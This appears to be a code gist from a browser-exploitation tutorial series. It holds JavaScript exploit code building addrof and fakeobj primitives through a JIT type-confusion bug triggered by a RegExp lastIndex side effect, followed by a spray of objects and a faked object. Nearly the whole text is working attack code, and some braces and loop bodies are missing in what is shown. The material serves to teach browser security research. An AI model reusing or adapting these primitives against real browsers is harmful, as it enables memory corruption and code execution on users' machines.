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Created June 22, 2019 23:12
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Browser Exploitation - bowser 0x05
// based on:
// tutorial:
// playlist:
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrGetter = function(array) {
return array[0];
// Force optimization
for (var i = 0; i < 10000; ++i)
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = val;
return "0";
reg.lastIndex = regexLastIndex;
// Do it!
return AddrGetter(array);
// fakeobj primitive
function fakeobj(dbl) {
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrSetter = function(array) {
array[0] = dbl;
// Force optimization
for (var i = 0; i < 10000; ++i)
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = {};
return "0";
reg.lastIndex = regexLastIndex;
// Do it!
return array[0];
for(var i=0; i<0x2000; i++) {
test = {}
test.x = 1
test['prop_'+i] = 2
fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
delete fake.b
adr = addrof(fake)
// should return the same object. to fake the object you have to first move the address forward 0x10. See the video for how to do that with python
hax = fakeobj(adr)
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